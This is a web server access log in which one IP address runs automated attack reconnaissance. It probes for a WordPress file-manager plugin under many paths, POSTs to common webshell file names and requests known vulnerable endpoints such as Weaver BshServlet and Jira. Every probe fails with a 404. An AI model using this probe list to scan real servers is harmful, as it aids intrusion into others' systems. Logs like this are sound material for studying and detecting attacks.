106.13.208.37 - - [01/Jan/2021:11:40:36 +0100] "GET /wordpress/wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 404 360 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:37 +0100] "GET /WordPress/wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 404 360 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:37 +0100] "GET /wp/wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 404 353 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:37 +0100] "GET /WP/wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 404 353 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:37 +0100] "GET /cms/wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 404 354 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:38 +0100] "GET /blog/wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 404 355 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:38 +0100] "GET /Blog/wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 404 355 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:38 +0100] "GET /dev/wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 404 354 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:39 +0100] "GET /demo/wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 404 355 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:39 +0100] "GET /site/wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 404 355 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:40 +0100] "GET /old/wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 404 354 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:41 +0100] "GET /backup/wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:41 +0100] "POST /templates.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [01/Jan/2021:11:41:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.13.208.37 - - [01/Jan/2021:11:41:02 +0100] "POST /yitian.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
106.13.208.37 - - [01/Jan/2021:11:41:25 +0100] "POST /shell.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
106.13.208.37 - - [01/Jan/2021:11:41:49 +0100] "POST /wuwu11.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [01/Jan/2021:11:42:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.13.208.37 - - [01/Jan/2021:11:42:12 +0100] "POST /xw.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
106.13.208.37 - - [01/Jan/2021:11:42:36 +0100] "POST /xw1.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
106.13.208.37 - - [01/Jan/2021:11:42:59 +0100] "POST /9678.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [01/Jan/2021:11:43:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.13.208.37 - - [01/Jan/2021:11:43:24 +0100] "POST /wc.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
106.13.208.37 - - [01/Jan/2021:11:43:49 +0100] "POST /xx.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [01/Jan/2021:11:44:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.13.208.37 - - [01/Jan/2021:11:44:13 +0100] "POST /xx.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
106.13.208.37 - - [01/Jan/2021:11:44:35 +0100] "GET /%73%65%65%79%6F%6E/%68%74%6D%6C%6F%66%66%69%63%65%73%65%72%76%6C%65%74 HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:44:38 +0100] "GET /secure/ContactAdministrators!default.jspa HTTP/1.1" 404 346 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:44:38 +0100] "GET /weaver/bsh.servlet.BshServlet HTTP/1.1" 404 334 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:44:39 +0100] "GET /solr/ HTTP/1.1" 404 310 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0)"
